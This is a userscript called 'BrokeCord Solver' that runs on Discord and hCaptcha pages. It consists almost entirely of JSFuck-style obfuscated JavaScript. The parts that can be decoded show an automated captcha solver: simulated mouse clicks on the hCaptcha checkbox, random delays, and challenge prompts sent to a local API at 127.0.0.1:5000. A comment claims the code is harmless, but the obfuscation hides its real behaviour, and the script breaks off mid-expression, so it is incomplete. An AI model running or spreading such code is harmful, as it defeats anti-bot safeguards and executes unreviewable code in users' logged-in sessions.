// ==UserScript==
// @name         BrokeCord Solver
// @version      0.1
// @description
// @match        https://*.discord.com/*
// @match        https://*.hcaptcha.com/*
// @grant        none
// ==/UserScript==

// Sorry for adding the code like this guys, it's to avoid skids selling or hcap patching it! There is no malicious code whatsoever, you can have a look at the network requests.

가=(!![]+[])[0]+([]+{})[1]+(([]+[])[([]+{})[5]+([]+{})[1]+([][[]]+[])[1]+(![]+[])[3]+(!![]+[])[0]+(!![]+[])[1]+([][[]]+[])[0]+([]+{})[5]+(!![]+[])[0]+([]+{})[1]+(!![]+[])[1]]+[])[9]+(!![]+[])[0]+(!![]+[])[1]+([][[]]+[])[5]+([][[]]+[])[1]+(([]+[])[([]+{})[5]+([]+{})[1]+([][[]]+[])[1]+(![]+[])[3]+(!![]+[])[0]+(!![]+[])[1]+([][[]]+[])[0]+([]+{})[5]+(!![]+[])[0]+([]+{})[1]+(!![]+[])[1]]+[])[14];나=([]+{})[5]+([]+{})[1]+([][[]]+[])[1]+(![]+[])[3]+(!![]+[])[0]+(!![]+[])[1]+([][[]]+[])[0]+([]+{})[5]+(!![]+[])[0]+([]+{})[1]+(!![]+[])[1];다=(![]+[])[0]+(![]+[])[2]+(![]+[])[1]+(!![]+[])[0];あ=(![]+[])[1];い=([][[]]+[])[1];う=(!![]+[])[3];$=(![]+[])[3];_=([]+{})[5];가가=([]+{})[1];가나=(![]+[])[2];가다=([][[]]+[])[2];가あ=([][[]]+[])[0];가い=(+[![]]+[])[0];가う=(1/0+[])[0];가$=(!![]+[])[0];가_=([]+{})[3];나가=([]+{})[8];나나=([]+{})[2];나다=(!![]+[])[1];나あ=(1/0+[])[7];나い=(![]+[])[0];나う=([][[]]+[])[5];[][다][나]("'"+가あ+$+う+' '+$+가$+나다+나う+_+가$+"'"+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+가나+う+가$+' '+あ+나い+가$+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'2'+'"'+')')()+う+나い+나다+う+$+(17)[가](20)+' '+'='+' '+나い+あ+가나+$+う+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+_+가나+あ+$+$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+가$+あ+가$+나う+_+' '+가$+나う+((0)[나]+[])[11]+う+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나う+나い+' '+'('+'!'+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+う+'.'+い+가가+(32)[가](33)+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+う+'.'+い+가가+(32)[가](33)+' '+'='+' '+'('+')'+' '+'='+'>'+' '+い+う+(32)[가](33)+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+う+'('+')'+'.'+(([]+[])[나]+[])[14]+う+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'['+']'+'['+'"'+다+'"'+']'+')')()[48]+あ+가$+う+'.'+い+가가+(32)[가](33)+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+가$+あ+가$+나う+_+' '+$+가나+う+う+(25)[가](30)+'('+나う+' '+'='+' '+'1'+'0'+'0'+'0'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+い+う+(32)[가](33)+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'0'+'"'+')')()+나다+가가+((0)[나]+[])[11]+나う+$+う+'('+'('+나다+う+$+가가+가나+([][다]+[])[23]+う+')'+' '+'='+'>'+' '+$+う+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+가가+가あ+가$+'('+나다+う+$+가가+가나+([][다]+[])[23]+う+','+' '+나う+')'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+가$+あ+가$+나う+_+' '+あ+$+나あ+い+_+' '+나다+あ+い+가다+가가+((0)[나]+[])[11]+'_'+$+가나+う+う+(25)[가](30)+'('+((0)[나]+[])[11]+나う+い+','+' '+((0)[나]+[])[11]+あ+(33)[가](34)+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가$+' '+가다+가あ+나다+あ+가$+나う+가가+い+' '+'='+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+あ+가$+(17)[가](20)+'.'+나い+가나+가가+가가+나다+'('+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+あ+가$+(17)[가](20)+'.'+나다+あ+い+가다+가가+((0)[나]+[])[11]+'('+')'+' '+'*'+' '+'('+((0)[나]+[])[11]+あ+(33)[가](34)+' '+'-'+' '+((0)[나]+[])[11]+나う+い+')'+' '+'+'+' '+((0)[나]+[])[11]+나う+い+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+가다+가あ+나다+あ+가$+나う+가가+い+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+나い+가あ+い+_+가$+나う+가가+い+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+う+가나+う+((0)[나]+[])[11]+う+い+가$+','+' '+_+가나+나う+う+い+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'8'+'"'+')')()+' '+'='+' '+い+가あ+가나+가나+','+' '+_+가나+나う+う+い+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'9'+'"'+')')()+' '+'='+' '+い+가あ+가나+가나+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+나う+나い+' '+'('+'!'+う+가나+う+((0)[나]+[])[11]+う+い+가$+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+나다+う+가$+가あ+나다+い+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+_+가가+い+$+가$+' '+う+([][다]+[])[23]+う+い+가$+가い+あ+((0)[나]+[])[11]+う+$+' '+'='+' '+'['+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+가가+([][다]+[])[23]+う+나다+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+う+い+가$+う+나다+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+가다+가가+(32)[가](33)+い+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+가あ+(25)[가](30)+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+_+가나+나う+_+(20)[가](21)+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+가가+가あ+가$+"'"+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+']'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+う+([][다]+[])[23]+う+い+가$+가い+あ+((0)[나]+[])[11]+う+$+'.'+나い+가가+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+あ+_+(17)[가](20)+'('+'('+う+([][다]+[])[23]+う+い+가$+가い+あ+((0)[나]+[])[11]+う+')'+' '+'='+'>'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+_+가가+い+$+가$+' '+가다+う+가$+あ+나う+가나+' '+'='+' '+う+([][다]+[])[23]+う+い+가$+가い+あ+((0)[나]+[])[11]+う+' '+'='+'='+'='+' '+"'"+((0)[나]+[])[11]+가가+가あ+$+う+가가+([][다]+[])[23]+う+나다+"'"+' '+'?'+' '+'0'+' '+':'+' '+'1'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+_+가가+い+$+가$+' '+う+([][다]+[])[23]+う+い+가$+' '+'='+' '+い+う+(32)[가](33)+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+([][다]+[])[23]+う+い+가$+'('+う+([][다]+[])[23]+う+い+가$+가い+あ+((0)[나]+[])[11]+う+','+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+가다+う+가$+あ+나う+가나+':'+' '+가다+う+가$+あ+나う+가나+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+([][다]+[])[23]+나う+う+(32)[가](33)+':'+' '+(32)[가](33)+나う+い+가다+가가+(32)[가](33)+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+나나+가あ+나나+나나+가나+う+$+':'+' '+가$+나다+가あ+う+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+_+あ+い+_+う+가나+あ+나나+가나+う+':'+' '+가$+나다+가あ+う+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+_+가나+나う+う+い+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'8'+'"'+')')()+':'+' '+い+가あ+가나+가나+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+_+가나+나う+う+い+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'9'+'"'+')')()+':'+' '+い+가あ+가나+가나+','+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+'}'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+う+가나+う+((0)[나]+[])[11]+う+い+가$+'.'+가다+나う+$+(25)[가](30)+あ+가$+_+(17)[가](20)+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[8]+([][다]+[])[23]+う+い+가$+'('+う+([][다]+[])[23]+う+い+가$+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+'}'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+'}'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+あ+$+나あ+い+_+' '+나い+가あ+い+_+가$+나う+가가+い+' '+(([]+[])[나]+[])[14]+う+가$+'_'+가$+あ+$+(20)[가](21)+'('+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'3'+'0'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+가나+う+가$+' '+((0)[나]+[])[11]+う+い+가あ+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'#'+((0)[나]+[])[11]+う+い+가あ+'-'+나う+い+나い+가가+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+((0)[나]+[])[11]+う+い+가あ+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+가나+う+가$+' '+가$+う+(33)[가](34)+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+(17)[가](20)+((![])[나]+[])[9]+가$+い+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+'#'+가$+う+(33)[가](34)+가$+'_'+_+(17)[가](20)+あ+가나+가나+う+い+(([]+[])[나]+[])[14]+う+"'"+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+$+나う+((0)[나]+[])[11]+가あ+가나+あ+가$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'4'+가다+'"'+')')()+가가+가あ+$+う+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가나+나う+_+(20)[가](21)+'('+가$+う+(33)[가](34)+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+(17)[가](20)+((![])[나]+[])[9]+가$+い+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+가나+う+가$+' '+나다+う+(25)[가](30)+う+あ+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+가あ+い+가$+' '+'='+' '+'1'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+(32)[가](33)+(17)[가](20)+나う+가나+う+' '+'('+나다+う+(25)[가](30)+う+あ+가$+[][다][나](나다+う+가$+가あ+나다+い+' '+う+$+_+あ+(25)[가](30)+う+'('+'('+'['+']'+'+'+'['+']'+')'+'['+'"'+$+가あ+나나+'"'+']'+'('+')'+')')()[2]+가가+가あ+い+가$+' '+'>'+' '+'0'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나い+가가+나다+' '+'('+가나+う+가$+' '+나う+' '+'='+' '+'0'+';'+' '+나う+' '+'<'+' '+'3'+';'+' '+나う+'+'+'+'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+あ+(32)[가](33)+あ+나う+가$+' '+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+나う+((0)[나]+[])[11]+う+'.'+$+가나+う+う+(25)[가](30)+'('+'2'+'0'+'0'+'0'+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가$+あ+$+(20)[가](21)+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+(17)[가](20)+'2'+'.'+(25)[가](30)+나다+가가+((0)[나]+[])[11]+(25)[가](30)+가$+'-'+가$+う+(33)[가](34)+가$+'#'+(25)[가](30)+나다+가가+((0)[나]+[])[11]+(25)[가](30)+가$+"'"+')'+'?'+'.'+나う+い+い+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'?'+'.'+나다+う+(25)[가](30)+가나+あ+_+う+'('+'/'+'\\'+$+'+'+'/'+(([]+[])[나]+[])[14]+','+' '+"'"+' '+"'"+')'+'?'+'.'+가$+나다+나う+((0)[나]+[])[11]+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+가$+あ+$+(20)[가](21)+'2'+' '+'='+' '+가다+가가+_+가あ+((0)[나]+[])[11]+う+い+가$+'.'+(26)[가](30)+가あ+う+나다+나あ+(([]+[])[나]+[])[9]+う+가나+う+_+가$+가가+나다+'('+"'"+가다+나う+([][다]+[])[23]+'.'+가$+う+(33)[가](34)+가$+'-'+가$+う+(33)[가](34)+가$+'#'+(25)[가](30)+나다+가가+((0)[나]+[])[11]+(25)[가](30)+가$+'-'+가$+う+(33)[가](34)+가$+"'"+')'+'?'+'.'+나う+い+い+う+나다+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'4'+'"'+')')()+う+(33)[가](34)+가$+'?'+'.'+나다+う+(25)[가](30)+가나+あ+_+う+'('+'/'+'\\'+$+'+'+'/'+(([]+[])[나]+[])[14]+','+' '+"'"+' '+"'"+')'+'?'+'.'+가$+나다+나う+((0)[나]+[])[11]+'('+')'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+가나+う+가$+' '+나い+가あ+가나+가나+가$+あ+$+(20)[가](21)+' '+'='+' '+가$+あ+$+(20)[가](21)+' '+'+'+' '+'"'+':'+' '+'"'+' '+'+'+' '+가$+あ+$+(20)[가](21)+'2'+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+_+가가+い+$+가$+' '+あ+(25)[가](30)+나う+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'5'+'5'+'"'+')')()+나다+가나+' '+'='+' '+"'"+(17)[가](20)+가$+가$+(25)[가](30)+':'+'/'+'/'+'1'+'2'+'7'+'.'+'0'+'.'+'0'+'.'+'1'+':'+'5'+'0'+'0'+'0'+'/'+あ+(25)[가](30)+나う+"'"+';'+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+[][다][나](나다+う+가$+가あ+나다+い+' '+가あ+い+う+$+_+あ+(25)[가](30)+う+'('+'"'+'%'+'0'+あ+'"'+')')()+' '+' '+' '+' '+' '+' '+' '+' '+나う+나い+' '+'('+가$+あ+$+(20)[가](21)+' '+'&'+'&'+' '+가$+あ+$+(20)[가](21)+'2'+')'+' '+'{'+[][다][나](나다+う+가$+가あ+나다+い+' 